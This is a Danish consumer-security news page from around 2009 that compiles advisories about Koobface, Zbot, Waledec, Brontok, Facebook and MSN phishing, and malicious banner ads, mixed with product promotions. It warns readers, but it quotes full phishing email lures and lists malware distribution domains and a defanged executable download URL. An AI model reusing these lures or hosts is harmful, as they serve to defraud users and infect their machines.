Hvis du er i tvivl om ægtheden af en mail eller en hjemmeside, så kontakt det "rigtige" firma
Når du på en webside afleverer følsomme oplysninger, så vær sikker på, at du er på en krypteret forbindelse.

Kilde : TDC 

Du skal passe på, hvad du klikker på på Facebook. Koobface forsøger stadig at fange dig.

Koobface ormen, som i særdeleshed er en trussel mod danske Facebook-brugere, fortsætter med at sprede sig. Også antallet af servere og domæner, der bruges til at knytte inficerede maskiner ind i et centralt BOTnet, er markant forøget. Det tolker sikkerhedseksperterne hos CSIS, som at antallet af inficerede maskiner er voksende.

Et af de mest aktive fast flux baserede drive-by domæner er (mellemrum
indlagt af CSIS): rect08 242009.com.

Brugere lokkes til at besøge den skadelige webside, ved at inficerede maskiner - uden at vide det - poster beskeder på vilkårlige Facebook vennernes væg, som du kan se på billedet.

Når Koobface har inficeret et system, vil den forgifte samtlige søgeresultater, så brugerens søgninger forvildes ind på websider, der intet har med søgningen at gøre, og som normalt aldrig ville være de resultater, man ville få af en normal for eksempel Google-søgning.

På nuværende tidspunkt lander 50% af samtlige søgninger fra inficerede maskiner på domænet (mellemrum indlagt af CSIS): find y31.com, der sender brugeren videre til følgende websider:

--> kc.mv.bids ystem.com
--> kc.xmls easrch.miva.com
--> www.tos eeka.com

Som tillæg til løbende søgemaskine-forgiftning, downloades også automatisk
en netbank- og informationstyv i Pinch familien.

Kilde: CSIS Security Group

 

Ikke alle venner er lige gode. Pas på hvilke venneanmodninger, du modtager fra Facebook i din indbakke.

Sikkerhedsfirmaet CSIS har stoppet flere spammails, som forsøger at lokke almindelige brugere til at klikke på et link.
Den uønskede mail udgiver sig for at komme fra Facebook og være en venneanmodning.

Advarsel

Hvis man klikker på linket, kommer man over på Facebook. Der modtager man en advarsel om, at man er ved at forlade Facebook. Hvis man ignorerer den besked, flyttes man til en helt vilkårlig ekstern webside, som intet har med Facebook at gøre - som i dette
tilfælde.

Formålet er at lokke brugeren til at klikke på de medfølgende links og eksponere brugeren for skadelig kode.

CSIS har orienteret Facebook om misbruget, så de forhåbentlig kan dæmme op for denne mulighed for fremtiden.

Kilde: CSIS Security Group

TJEK DIN PC FOR SPYWARE - KLIK PÅ SIKKERHEDSPRODUKTER - KLIK PÅ SUPERANTISPYWARE PRO . 

Hop ikke på tricket med opdatering af Flash-player - hverken på mail, Facebook, MySpace eller Twitter.

Sikkerhedsfirmaet CSIS har set en stigning i antallet af inficerede Koobface
maskiner. De har derfor løftet deres trusselsniveau til medium og intensiveret overvågning af Koobface og deres centrale Command & Control servere.

Koobface er en orm, som spreder sig via populære sociale netværk. I Danmark har den primært succes med at replikere sig via Myspace, Twitter og naturligvis Facebook.


Når ormen inficerer en maskine, vil den automatisk begynde at sende beskeder til venner og bekendte. Adresserne henter den på den inficerede maskine, og beskeden linker videre til en skadelig webside.
Beskeden handler om, at der skal hentes en ny Flash-afspiller.

Ormen bruger domænenavne som springbræt videre til zombiemaskiner, der via en HTTP proxy stiller deres harddisk og internetforbindelse til rådighed og som eksponerer andre brugere for den skadelige kode: "setup.exe".

En typisk infektion starter med at en bruger besøger et af følgende domæner (mellemrum indlagt af CSIS). Det kan ske ved at klikke på et link, man modtager fra en ven eller bekendt:

upr20 0908013.com
xtsd 20090815.com
upr0 306.com
free var.com
suz1 1082009.com
boom er-110809.com
bell jarstudio.com
akes heronline.com
piup iu-110809.com
find hereandnow.com

Domænet flytter brugeren videre til download servere, hvorfra filen "setup.exe" tilbydes.

Dens foretrukne lokkemad, som den også anvender i søgemaskine-kampagner, er for øjeblikket:

"hurricane-bill-increases-in-strength"



Den skadelig fil (setup.exe) opdateres løbende, men fanges på nuværende tidspunkt af TDC's Sikkerhedspakke.

Kilde: CSIS Security Group

 

Pas på hvad du siger ja til. Meetyourmessenger vil have adgang til alle dine kontakter.

Sikkerhedsfirmaet CSIS ser hyppigt phishing med videre mod MSN og Hotmail. Et nyligt eksempel ønsker at høste brugernavn og password ved at lokke brugeren til at klikke på et link modtaget via MSN og herfra gå videre til en forfalsket webside og indtaste følsomme og private login oplysninger.

Beskeden ankom med følgende indhold (mellemrum indlagt af CSIS):

aaaliumin@hotmail.com said:
OMG u gotta see this! Go here: http://goret sky.obama-offers.com
http://Yest erdays-Nig htmare.com/ you need to join me here (L)(K) brb!!

I ovenstående eksempel er der tydeligvis tale om regulær phishing, men hvad
med en dansk webside som 'Meetyourmessenger.dk', som også opfordrer til at
opgive brugernavne og passwords til MSN og Hotmail. Er det ok, selvom de gemmer sig bag en pænt udformet facade?

Brugerbetingelser

Lad os kigge på deres brugerbetingelser til at begynde med:

De skriver blandt andet:

Stk. 2. Samtykke til markedsføring
'"Jeg godkender at modtage e-mails, nyhedsbreve, opdateringer, brugerundersøgelser og specielle tilbud i henhold til mine interesser, sendt fra meetYourmessenger.'

Stk. 2. Betingelser for brug af meetYourmessenger

1. Ved at indtaste din e-mail adresse accepteres samtidigt, at vi må
udsende nyhedsbreve m.m. vedrørende meetYourmessenger til dig.

2. Ved indtastning af brugernavn og kodeord til de netværk/tjenester du i øvrigt bruger f.eks. Webmail, AOL Messenger, Gmail eller MSN Messenger etc. eller ved brug af meetYourmessengers Friendfinder, bliver der af hensyn til kortlægning af dine venner i dit netværk sendt en invitations-e-mail til alle dine kontaktpersoner.

3. Ved oprettelse af en profil importeres e-mails på kontaktpersoner,
som bruges til at kæde allerede oprettede venner sammen. MeetYourmessenger bruger udelukkende informationerne til at kortlægge netværket af dine kontakter og visualisere dette.

6. MeetYourmessenger forbeholder sig retten til at slette profiler vi
skønner useriøse eller på anden måde ikke har indtastet sandfærdige data omkring sig selv - evt. i kombination med en useriøs profiltekst eller slet ingen profiltekst

§6 Persondatapolitik

4 Videregivelse af persondata

Alle de oplysninger, som du giver om dig selv i forbindelse med din brug af meetYourmessenger, kan af meetYourmessenger videregives til andre brugere af meetYourmessenger i forbindelse med disses brug af meetYourmessenger som socialt netværk.

Man kan i øvrigt ikke se, hvem der står bag dette firma, ligesom der ikke
findes nogen konkrete kontaktoplysninger. Det kombineret med, at firmaet bag
høster adgangskoder til MSN og Hotmail samt andre online services finder CSIS
yderst betænkeligt.

CSIS opfordrer til, at du tænker dig om en ekstra gang, inden du lader firmaer som dette få adgang til dine private oplysninger - og dine venners...

Kilde: CSIS Security Group



 

Facebook har været udsat for 419 forskellige typer af phishing.

UNDGÅ AT BLIVE RAMT

Når du er på Facebook, skal du tjekke , at der står WWW.FACEBOOK.COM først i adresse feltet. Skifter adressen, er du sandsynligvis på vej til en phishing side, især hvis du bliver bedt om at logge på Facebook igen.

HVAD ER PHISHING ?

Phishing er en omskrivning af ordet fishing, der betyder fiskeri, og dækker da også over svindlere, som forsøger at fiske personlige oplysninger ud af ofrene - gerne kreditkort- eller netbankoplysninger.

Det sker typisk ved, at du modtager en falsk besked fra en bank, online-butik, et forsikringsselskb eller en anden troværdig afsender. Mailen opfordre dig til at opgive dine personlige oplysninger, numre på kreditkort, kontonumre, personnumre og pinkoder og derpå sende e-mailen tilbage med oplysningerne eller klikke ind på en hjemmeside,hvor du skriver oplysningerne.

Kilde Komputer.dk


Her kan du tjekke om du har fået noget "skidt" på din PC

Har du Spyware/Malware på din PC

SUPERAntiSpywarePro er den mest grundige scanner på markedet. Vores Multi-Dimensionale Scanning og Process forhørs Teknologi vil finde spyware som andre produkter overser!

SUPERAntiSpyware vil fjerne al Spyware, ikke kun de der er nemme at finde eller fjerne!

Klik på læs mere





 Læs mere...

Lad dig ikke lokke med udsigten til at se Megan Fox nøgen - du får intet at se, udover et lænset kreditkort.

Reklamerne distribueres ud via YouTube.com og ankommer med følgende indhold (mellemrum indlagt af CSIS):

Meg aTape.com h@s Megan_Fox naked!

eller

Megan_Fox exclsive sex vid Meg anTape.com

Fælles for begge reklamer er, at de skal lokke almindelige brugere til at besøge websiden (mellemrum indlagt af CSIS) "Meg anTape.com".

På denne webside findes et billede af en lettere afklædt Megan Fox.
Lokkemaden er selvfølgelig at forføre brugeren til at klikke på 'afspil' ikonet (se billedet), men desværre (og langt fra overraskende) så er tingene ikke, som de helt ser ud til at være ...

Popup reklamer

Den skuffede bruger, som sikkert gerne have set Megan Fox posere, mødes nemlig af flere forhindringer; den første webside flytter den naive bruger videre til en anden webside: (mellemrum indlagt af CSIS): www.double etarefresh.com, som indeholder en henvisning/referal for at give kampagnens bagmand et kontant afkast. Så selv i den kriminelle verden skal ret være ret, og man skal have sine penge for at skaffe kunder i butikken...

Men rundvisningen er ingenlunde slut der. I det øjeblik brugeren klikker på
linket og videredirigeres, så sendes trafikken med det samme over til domænet: (mellemrum indlagt af CSIS) www.mb 01.com.

Så det er altså endnu en kampagne, hvor det eneste formål er at levere skadelig kode til uforsigtige internetbrugere igennem snedig social enginering.

En af de mange flashbaserede reklamer, der popper op i browseren, skal lokke brugeren til at hente ringetoner til mobiltelefonen, men naturligvis til rimelig overtakst.
Betalingen for servicen foregår, udover at blive klippet på mobilregningen, også via kreditkort. Men hvad dine oplysninger også kan bruges til, melder historien ikke noget om - det er kun fantasien, der kan sætte grænser for hvad, oplysningerne kan bruges til.

Kilde: CSIS Security Group
 

Som varslet har Microsoft frigivet sikkerhedsopdateringer for juli måned.

Opdateringerne, som vi anbefaler installeres med det samme, er alle kategoriseret som kritiske - og det med god grund, da flere misbrugt aktivt i angreb mod vilkårlige windows klienter eller som led i mere målrettede spear-phishing angreb.

Automatisk opdatering
TDC Online anbefaler, at du henter opdateringerne hurtigst muligt. Hvis din computer ikke er sat til automatisk at hente opdateringerne, skal du selv hente dem hos Microsoft Update.

Hent opdateringer automatisk
Du kan nemt tjekke, om din computer er sat op til at hente opdateringerne automatisk sådan her:

Højreklik på Denne computer på Skrivebordet
Vælg Egenskaber
Under fanebladet Automatiske opdateringer kan du se, om du har slået automatisk opdatering.
Hvis du downloader opdateringen manuelt og lægger den på din pc, skal du også huske at installere den. Dobbeltklik på filen og følg vejledningen.

Mere om opdateringerne

Opdateringerne fordeler sig således. Hvis du vil vide mere om de enkelte opdateringer, kan du læse mere hos Microsoft.

Microsoft Security Bulletin MS09-028
Vulnerabilities in Microsoft DirectShow Could Allow Remote Code Execution (971633)
Risikovurdering: Kritisk

Microsoft Security Bulletin MS09-029
Vulnerabilities in the Embedded OpenType Font Engine Could Allow Remote Code Execution (961371)
Risikovurdering: Kritisk

Microsoft Security Bulletin MS09-030
Vulnerability in Microsoft Office Publisher Could Allow Remote Code Execution (969516)
Risikovurdering: Kritisk

Microsoft Security Bulletin MS09-031
Vulnerability in Microsoft ISA Server 2006 Could Cause Elevation of Privilege (970953)
Risikovurdering: Vigtig

Microsoft Security Bulletin MS09-032
Cumulative Security Update of ActiveX Kill Bits (973346)
Risikovurdering: Kritisk

Microsoft Security Bulletin MS09-033
Vulnerability in Virtual PC and Virtual Server Could Allow Elevation of Privilege (969856)
Risikovurdering: Vigtig

Bemærk, at MS09-032, som er kategoriseret som kritisk, indeholder en stribe "killbits" der deaktiverer en række usikre ActiveX CLSIDs fra at kunne initialiseres igennem COM objekter.

Kilde: CSIS Security Group

 

Tænk dig om, når du bruger et autosvar på din mail. Din venlighed og dine informationer kan give ubehagelige overraskelser.

Husker du reklamen, hvor manden stolt greb telefonen i sommerhuset og sagde ”Vesterhavshytten”, hvorpå tyvene strøg ud og tømte hans hus?

Du kan risikere, at det samme sker for dig, hvis du er for rundhåndet med oplysningerne i dit autosvar i din mail.

Et autosvar er en standardhilsen, du kan sætte dit mailprogram til at sende dem, der sender dig en mail.

Nogle fortæller i deres autosvar, at de er på ferie i udlandet i så og så længe og har desuden for eksempel telefonnummer i bunden af mailen, så man let kan slå mailadresse eller telefonnummer op på nettet og finde ud af, hvor der står et hus med en ejer, der er ude af landet.

Spammere læser også dit autosvar
Andre har et svar, der blot siger, at mailen er modtaget og vil blive læst.

Når du modtager en spammail, vil spammeren i den anden ende modtage dit autosvar. Han ved derved, at han har fundet en gyldig mailadresse.

Hvis han ikke får noget svar, ved han stadig ikke, om der var bid.
Så når du sender ham dit autosvar, er det lige så godt som penge i banken for ham. For han har nu en adresse, der er så god, at han kan sende den videre til andre spammere og sige, at den virker.

Det rent og skært nødvendige
Du bør derfor nøje overveje hvad, du vil med dit autosvar.
Får personen i den anden ende egentlig noget ud af at få at vide, at du har modtaget mailen og vil læse den.
Ja selvfølgelig hvis du bare plejer at slette dem uden at læse dem… Men ellers er det også bare en mail, der fylder i afsenderens postkasse.

Når det kommer til autosvar, bør du tænke på, hvad der er ”nice to know” og ”need to know”. Når vi taler sikkerhed, så bør du absolut minimere det til ”need to know” – altså hvad er allermest nødvendigt at vide i forhold til hvad, der kunne være rart at vide.

Læser du kun mails ind i mellem, kan det være godt at vide, og er du væk i lang tid, er det også god information. Men lad være med samtidig at give din privatadresse og dit telefonnummer, så andre kan finde frem til din bopæl.

Du tænker måske, at du jo kun modtager mails fra folk, du kender, der kender dig, så der er ingen fare. Men tænk lige igen…
Hvor mange nyhedsbreve abonnerer du på? Hvor mange konkurrencer har du tilmeldt dig med din mailadresse? Hvilke mailinglister er du på?
Det kan alligevel med tiden blive mange personer udenfor din umiddelbare omgangkreds, der får dit autosvar at se.

Så overvej om det egentlig overhovedet er nødvendigt for dig at have et autosvar, eller om du måske skal skære lidt ned på informationerne i det.

Facebook og lignende
Der er mange af de sociale netværk, hvor brugerne fortæller lidt om hvad, de går og laver. Op til ferierne er det typisk at læse små beskeder som 'Flyver om 9 dage', 'Ligger på stranden på Kreta om 4 dage' eller ' Er tilbage fra ferie den 26. juli'.

Tænk igen på hvem, der kan læse med. Du bruger formentlig en masse krudt på at få huset til at se beboet ud ved at tænde lyset, få naboen til at tømme postkassen og lignende, når du skal på ferie. Og du ville aldrig sætte en seddel på døren, hvor der står, hvornår du kommer hjem fra ferie.

Men det gør du sådan set, når du fortæller det på nettet. Du er sjældent helt anonym på nettet, og din net-profil hænger tit sammen med din 'rigtige' person.

Tænk dig om og fortæl kun det allermest nødvendige...

Kilde: TDC
 

Allerede få timer efter superstjernens død, begyndte spammerne at sende mails ud med popkongen som lokkemad.

Som vi har advaret mod og set før, så er de it-kriminelle superhurtige til at udnytte fænomener og tendenser, som er oppe i tiden og kan lokke mange til at åbne deres mails og klikke på linkene.

Så vær forberedt på, at de mails, der lander i din indbakke med nyt om Michael Jackson formentlig ikke vil dig noget godt.
De vil naturligvis forsøge at lokke dig med nye detaljer om hans død, interessante billeder og andet i den stil.

Et eksempel allerede få timer efter nyheden kom ud, var en mail, hvor man skulle svare tilbage for at få de utroligt spændende detaljer og hemmelige oplysninger, som personen bag mailen lå inde med.
Det var naturligvis kun en måde at høste mailadresser på. Hver gang én svarer tilbage, så kan spammeren putte den i arkivet og sælge den videre.

Så medmindre mailen kommer fra én, du kender yderst godt, og som rent faktisk også kunne finde på at sende dig links om popkongen, så anbefaler vi, at du sletter mailen.

Kilde: TDC 

Spammail lokker med opdatering til Microsoft Outlook

Slet omgående den mail, der siger, at den har en sikkerhedsopdatering til Microsoft Outlook. Den er ude efter penge.

Endnu en netbank-tyv er skudt i omløb med en masse spammails.
I denne spammail lokker de it-kriminelle med en sikkerhedsopdatering til Microsoft Outlook. Du skal slette mailen og ikke åbne den medfølgende vedhæftede fil.

Denne spam-kampagne gør brug af forskellige emnelinjer men selve indholdet af mailen er det samme. Den ankommer som vist herunder:

Afsender: [Forfalsket - foregiver at komme fra Microsoft]

Emne: [en af følgende kombinationer]

Critical Update for Microsoft Outlook
Install Update for Microsoft Outlook
Microsoft Outlook Critical Update
Update for Microsoft Outlook
Microsoft has released an update for Microsoft Outlook

Indhold:

Critical Update

Update for Microsoft Outlook / Outlook Express (KB910721)Brief Description
Microsoft has released an update for Microsoft Outlook / Outlook Express. This update is critical and provides you with the latest version of the Microsoft Outlook / Outlook Express and offers the highest levels of stability and security.

Instructions

Install Update for Microsoft Outlook / Outlook Express (KB910721). To do this, follow these steps:

Run attached file officexp-KB910721-FullFile-ENU.exe
Restart Microsoft Outlook / Outlook Express

Quick Details

File Name: officexp-KB910721-FullFile-ENU.exe
Version: 1.4
Date Published: Wed, 17 Jun 2009 14:34:20 -0500
Language: English
File Size: 81 KB

System Requirements

Supported Operating Systems: Windows 2000; Windows 98; Windows ME; Windows NT; Windows Server 2003; Windows XP; Windows Vista

This update applies to the following product: Microsoft Outlook / Outlook Express

Contact Us
© 2009 Microsoft Corporation. All rights reserved. Contact Us |Terms of Use |Trademarks |Privacy Statement

Vedhæftet [en af følgende kombinationer]:
officexp-KB910721-FullFile-ENU.zip
officexp-KB910721-FullFile-ENU.exe
office.zip

Kender natbankerne

Den vedhæftede fil er en netbank-tyv i Zbot familien.

Hvis koden køres, så droppes den skadelige kode til systemet. Den tapper herefter forskellige følsomme data fra maskinen, som den sender til en server i Ukraine. Den inficerede maskine kan løbende blive opdateret og kontrolleret. Tyven er særligt designet til at angribe netbank-løsninger.
Den høster data fra certicate store, FTP og POP3 brugernavne og passwords, indeholder en keylogger, der aktiveres når en liste med særlige hjemmeside-adresser (som downloades fra C&C serveren) besøges i browseren.

Tyven kan være vanskelig at fjerne fra en inficeret maskine. Sikkerhedsfirmaet CSIS har dog udviklet et removal tool, der kan fjerne denne familie af crimeware fra inficerede maskiner.

Den skadelige kode fanges af Norman Security antivirus

Kilde: CSIS Security Group

 

Netbanktyv siger, dit kort er blevet stjålet

Dine kreditkort-oplysninger er blevet stjålet, se hvad kortet er blevet brugt til. Nej - lad være med at falde for det trick.

Sikkerhedsfirmaet CSIS har stoppet et betydeligt antal spammails. Mailsene forsøger at lokke uforsigtige modtagere til at klikke på den medfølgende link, som vil kompromittere maskinen, hvis filen åbnes.
Den vedhæftede fil er i følge mailen selv en oversigt over de sidste betalinger foretaget med dit kreditkort. Afsenderen af mailen skriver, at dine kreditkort-detaljer er blevet stjålet, så andre har brugt dit kort. Du skal derfor åbne den vedhæftede fil for at se hvad, kortet er blevet brugt til.

Du skal naturligvis bare slette mailen, hvis den skulle havne i din indbakke.

Den pågældende spammail har følgende indhold:

Fra: [Spoofet/forfalsket afsender adresse]

Emne: Information of your Transactions

Indhold (mellemrum indlagt i link, så der ikke kan klikkes direkte på dem):

Good evening
Dear Credit Card Holder:

The last transaction report on your credit card shows a number of transactions that have questionable background. That gives us reasons to believe that your credit card details have been stolen, and your card has been abused for making unauthorized payments.

Enclosed is the listing of transactions made with your credit card between 13.06.2009 and 15.06.2009. Please look through the enclosed document carefully and pay special attention to the last three of the listed transactions - they are the ones that we suspect to be fraudulent.

Please find time to review the enclosed account statement and confirm the transactions you have authorized in person. This would help us both to have this issue resolved as quickly as possible.

The Word-formatted copy of your transaction list:

http://sca nanida.com.pl/report_8977.exe

Netbank-tyv

Hvis brugeren fristes af indholdet, og klikker på det pågældende link, så tilbydes den binære fil "report_8977.exe".

Der er tale om en netbank-tyv, som med det samme begynder at grave efter digitale certifikater i Microsoft Windows Certicate Store:

CertCloseStore
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertOpenSystemStoreW

Den danner herefter et BHO (Browser Helper Object), som den anvender til at sniffe og manipulere trafik, der transmitteres igennem Microsoft Internet Explorer. Den opsamler dernæst cookies fra maskinen og sender dem til en dropserver. De indsamlede cookies kan anvendes til at bestemme, om der findes interessante mål (netbank-adgang) på den pågældende maskine.

Kilde: CSIS Security Group



 

Orm inviterer til Twitter

Modtager du en invitation til Twitter, skal du holde fingrene fra den farlige zip-fil. Den er ude efter din pc.

Hvis du modtager en invitation til Twitter, skal du ikke føle dig beæret men bare slette den. Der er nemlig tale om en orm, der er ude med riven for at få din pc med i sit net.

En variant i Brontok/Ackantta familien, som er en e-mail baseret orm, snor sig i øjeblikket i moderat grad blandt vilkårlige internet-brugere. Det sker fter at et spamrun blev skudt i gang i går eftermiddag.

Zip-fil

Ormen inviterer blandt andet modtageren til at oprette sig på Twitter (et populært
socialt netværk), men dens egentlige formål er at lokke modtageren til at åbne den vedhæftede zip-fil, som indeholder den selvreplikerende kode.
Filen skulle indeholde navnet på den, der har inviteret dig for at friste de nysgerrige sjæle.

Denne orm spreder sig via mail og shares i et netværk. Den ankommer med forskelligt indhold, som i den HTML-baserede mail trækkes direkte fra Twitter, Google og Hallmarks websider. Det kan få mailen til at se mere troværdig ud.

Ormen ankommer til vilkårlige brugere, og gør blandt andet reklame for Twitter, Google og Hallmark.
Hvis modtageren kan lokkes til at udpakke og køre den vedhæftede zip fil ("Invitation card.zip", "Invita68.zip" eller "Postcard.zip"), så finder man den skadelige kode med følgende filnavn: document.jpg[massevis af mellemrum].exe.

Dræber sikkerheden
Der er tydeligvis tale om en klassisk mail-orm, der bærer sin egen indbyggede SMTP server, som den anvender til at sende spammails videre til andre modtagere fra inficerede systemer. Samtidig forhindrer den adgang til talrige domæner, der tilhører forskellige antivirus-producenter, mens den endvidere dræber den sikkerhedssoftware, som følger med Microsoft Windows.

Ormen er forøvrigt i familie med den orm, som i December måned reklamerede for McDonalds, Hallmark og Coca-Cola, hvis du husker den?

De fleste opdaterede antivirus-programmer fanger ormen - herunder Normans sikkerhedspakke

LÆS MERE OM NORMAN UNDER SIKKERHEDSPRODUKTER TIL HØJRE I MENUEN

Kilde: CSIS Security Group
 

Mails fra kurerfirmaet UPS om problemer med en pakke, kan give dig masser af problemer, så hold dig fra den.

IT-kriminelle har i løbet af den forgangne fået sparket en masse mails afsted, hvor vilkårlige modtagere skal lokkes til at åbne den medfølgende fil.
Filen er et zip-arkiv med en Zbot variant, og mailen lader som om, at den kommer fra kurerfirmaet UPS (United Parcel Service). Det drejer sig om en pakke, der ikke kunne leveres. Det er naturligvis for at pirre modtagerens nysgerrighed, så zip-arkivet åbnes, og den skadelige kode aktiveres.

Den uønskede e-mail ankommer med følgende indhold:

Emne [bemærk at leverance-nummer er dynamisk dannet og for eksempel kan være]:
Postal Tracking #FDD4Q22514LDU4N
Postal Tracking #SVD8J64500H1B78
Postal Tracking #GBS93792671R1ZT

Indhold:

Hello!

We were not able to deliver postal package you sent on the 14th of March in time because the recipient's address is not correct. Please print out the invoice copy attached and collect the package at our office.

Your United Parcel Service of America

Vedhæftet [følgende kombinationer observeret]

UPS_DOC_986001.zip
UPS_NR1.zip
UPSEXL_GEN99012.zip
UPSDOCS_DLF0087121.zip
UPSTRACKING_DS9961201.zip
UPSDOC14.zip
UPSDOCS_IN987712001.zio

Den vedhæftede zip-pakke indeholder den skadelige Zbot kode med samme navn
som arkivet, men dog som en exe-fil.

Hvis den vedhæftede fil pakkes ud og åbnes af en uforsigtig bruger, dropper den en bunke filer til maskinen.
Den nu kompromitterede maskine ringer herefter hjem til en server, hvorfra den samtidig automatisk nedhenter en krypteret konfigurationsfil. Den fortæller dernæst Zbot komponenten på maskinen, at den skal forbinde sig til en anden server, hvorfra data, der indsamles fra systemet, løbende transmitteres.

Herefter installeres et falsk antivirusprogram på maskinen.

Kilde: CSIS Security Group

 

Servicepakke 2 til Windows Vista frigivet

Vista-brugere bør hente Servicepakke 2, da den samler alle sikkerhedsopdateringer og giver bedre performance.

Microsoft har frigivet den omfattende servicepakke 2 til Windows Vista. Pakken indeholder talrige forbedringer både i performance, stabilitet og sikkerhed. Pakken fylder 1376.8 MB.

Servicepakke 2 samler alle opdateringer frigivet siden servicepakke 1, men indeholder også flere nye drivere til hardware understøttelse.
Et reelt performance løft i forhold til servicepakke 1 er mærkbar, men afgjort hverken revolutionerende eller årsag til at skifte til Vista, når der venter en Windows 7 lige om hjørnet, siger sikkerhedseksperterne fra CSIS.
Men når det er sagt, bør alle Vista brugere opgradere snarest muligt.

Opdateringen kan allerede nu hentes manuelt, men vil først blive frigivet via 'Windows update' og automatisk opdatering fra om cirka 14 dage.

Bemærk desuden, at den dansk sprogede servicepakke ikke er blevet gjort tilgængelig endnu, men det forventes at ske indenfor nogle få dage.

Yderligere oplysninger samt link til opdatering finder du hos Microsoft.

Kilde: CSIS Security Group

Få en hurtig og inspirerende gennemgang af Windows Vista, der tilbyder mange nye muligheder. Læs om brugerfladen, de udvidede søgemuligheder, den forbedrede sikkerhed og dynamisk indhold i det nye Windows Sidepanel. Du lærer også at organisere dine fotos i programmet Billedgalleri, arbejde med e-mails i Windows Mail og anvende de nye faciliteter i Internet Explorer.


Læs mere i hæftet Lær mere om Vista under vores sikkerhedsprodukter i venstre side. 

Hvis du er typen, der kunne lade dig friste af at et tilbud om at få én af dine venners Facebook-konto hacket, så skal du passe på, hvad du falder for.

En it-kriminel tilbyder at hacke Facebook-kontoer mod betaling. Prisen er 50 dollars per konto. Men sikkerhedsfirmaet CSIS har lavet en kort vurdering af websiden og kunne hurtigt afsløre, at der er tale om fup.

Selvom man kan lade sig friste af denne type tilbud (og talrige andre på nettet), så skal man naturligvis holde fingrene for sig selv og ikke lade sig forføre af muligheden for at hacke andres Facebook konto. Og da slet ikke i denne sammenhæng, da der tydeligvis er tale om fup.


Kilde: CSIS Security Group 

Kriminelle fisker efter Facebook-passwords

Får du en mail på Facebook med et link til junglemix, så slet mailen. De er ude efter dit password.


Sikkerhedsfirmaet CSIS har registreret en ny bølge af Facebook spam, der forsøger at lokke brugere til at opgive brugernavn og passwords på forfalskede Facebook sider. Samtidig forsøger den skadelige webside at inficere systemet igennem drive-by angreb, hvor den udnytter flere sårbarheder i andre populære programmer.

Hvis du modtager en besked via Facebook's interne beskedsystem med følgende indhold, så slet den (mellemrum indlagt af CSIS):

[Navn på bruger] sent you a message.

Emne: Hello

junglemix.in

Hvis brugeren lokkes til at klikke på det medfølgende link, så lander man på en webside, der med det samme videredirigerer brugeren til en skadelig drive-by platform.

Det er websiden 'fbli ght.com', man lander på, og den fisker efter brugernavn og password til Facebook og indeholder exploitkode.
Man kan med fordel blokere for domænet i den centrale firewall/proxy eller content filter.

Kilde: CSIS Security Group

 

Banner leverandøren "Yieldmanager" har igennem en underleverandør lanceret en reklamekampagne, som indeholder skadelig kode. Sikkerhedsfirmaet CSIS anslår, at flere tusindende brugere er blevet udsat for den skadelige kode.

Bannerinjektion er blevet et yndet våben blandt de it-kriminelle. Denne form for angreb giver en stor radius, og samtidig mulighed for at tilpasse angrebet til regionale forhold. Den skadelige kode som hyppigt lanceres igennem bannerinjektion kan være alt fra videredirigering til en skadelige sider eller popups, der tilbyder falske sikkerhedsprodukter. Begge sådanne angrebsformer har for øvrigt tidligere været lanceret via populære danske medier.

Misbruger talrige sårbarheder

I det konkrete tilfælde indeholder det skadelige Shockware Flash-banner et kodet Actionscript der sender trafik, og dermed brugeren, videre til en webside der forsøger at misbruge talrige sårbarheder i populære tredjepartsproduker, som f.eks. Adobe Reader/Acrobat, Flash, Quicktime og JAVA JRE.

I det konkrete angreb er der brugt ikke færre end 26 forskellige domæner. Alle sider ligger hos et hostingselskab i Riga, Letland. Domænerne peger på servere, der befinder sig i samme netblok.

Koden forsøger at indlæse skadelige PDF- og SWF-filer. Hvis systemet ikke er forsvarligt opdateret med samtlige relevante patches, så kører maskinen, uden brugerens viden, et falsk sikkerhedsprodukt. Som del af angrebet er der såkaldt "ransomware", der kidnapper brugerens data og opkræver penge for, at systemet låses op. Koden er i Blackmailer-familien og anmoder om, at der sendes en SMS med et særligt indhold til et overtakseret modtagernummer for derved at tjene penge på trafikken.

Kilde: CSIS Security Group

 

Spam lokker med sms-udspionering

Modtager du en mail om, at du kan udspionere din kærestes sms'er med et smart lille program. Så slet mailen.

Den meget omtalte familie af skadelig kode, kendt under navnet 'Waledec' og som bl.a. distribueres automatisk ud til Conficker-inficerede maskiner, har netop lanceret en ny spamoffensiv.

Udover at de spammer ny skadelig kode ud til vilkårlige modtagere i form af et medfølgende link til en fjendtlig webside, hvorfra der tilbydes en skadelig fil, så har de også ændret tema og strategi.

Der lokkes nu med 'sms-udspionering'.

De pågældende spammails ankommer med et yderst dynamisk indhold, hvor afsenderadressen er forfalsket.

Sikkerhedsfirmaet CSIS har set følgende tekstvariationer anvendt:

Emnelinjen:

Read his SMS
The world's most advanced sms reading program
Now, It's possible to read other people's SMS
Read other people's SMS online
You can read anyone's SMS

Indhold (det skadelige link er fjernet)

Do you trust her? http://[link]
You can read anyone's SMS http://[link]
Do you really trust her? http://[link]
Do you really trust him? http://[link]
Are you ready to know the truth? http://[link]
Are you sure you want to know? http://[link]

De forskellige domæner skal lokke brugeren via en webside til at åbne den skadelige fil "smsspy.exe" - som ifølge siden er et spionprogram til sms. I virkeligheden er der tale om en Waldec-variant med mange ubehagelige funktioner.

HENT GRATIS SPAMFIGHTER VED AT KLIKKE PÅ LÆS MERE




Kilde TDC Læs mere...

SÅDAN BEKÆMPER DU SPAM.

EN RIGTIG GOD LILLE VIDEO SOM FORTÆLLER DIG ALT OM SPAM SAMT HVORDAN DU BESKYTTER DIG (3:13 minutter)

Klik på linket hvor der står Læs mere.

PS. I menuen til højre under Sikkerhedsprodukter kan du hente vores GRATIS TRYUS SPAMFIGHTHER

Kilde TDC

 Læs mere...

Facebook bøjer sig for Jubii



Vi kan nu informere om, at det var en fejl, at facebook torsdag den 2. april blokerede 60.000 danskere med en Jubii-mail.

Løsningen på mysteriet bag blokering lod vente på sig, og først mandag den 6. april lykkedes det, efter flere mails og opringninger, at få en afklaring fra den amerikanske mastodont.

Problemet var opstået, da facebook havde besluttet, at ordet Jubii ikke måtte indgå i de mailadresser, brugerne benyttede til at logge ind på facebook med.

Årsagen til fejlen lå ene og alene hos facebook i USA. Ind imellem tilføjer facebook nogle ord, som ikke må indgå i de mailadresser, man bruger til at oprette en profil på facebook, og i torsdags tilføjede facebook så ordet Jubii. Men de har altså ikke skelnet til, at 60.000 nuværende brugere havde Jubii i deres login-oplysninger i forvejen.

Vi søger stadig en forklaring på, hvorfor facebook valgte at sortliste ordet Jubii.

